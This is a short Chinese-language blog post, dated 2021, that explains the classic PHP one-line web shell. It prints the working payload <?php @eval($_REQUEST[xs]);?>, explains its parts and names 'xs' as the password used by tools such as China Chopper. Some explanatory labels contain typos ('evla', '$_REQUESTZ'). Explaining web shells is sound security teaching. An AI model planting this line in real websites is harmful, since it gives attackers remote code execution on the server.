一句话代码执行

一句话木马就是只需要一行代码的木马,短短一行代码,就能执行任意代码,从而控制系统。

经典一句话执行

【@evla】:执行php代码:
【$_REQUESTZ】:全局变量,包含http方法:【$_GET】,【$_POST】,【$_COOKIE】
【xs】:URL中http请求传入的参数名为value的参数
【'xs'】也就是菜刀等工具连接密码

<?php @eval($_REQUEST[xs]);?>

php-eval-1.png

就这一行代码害死人,这样任何人都可以POST请求执行函数代码,造成代码执行,从而控制系统

视频演示

最后修改:2021 年 09 月 18 日
如果觉得我的文章对你有用,请随意赞赏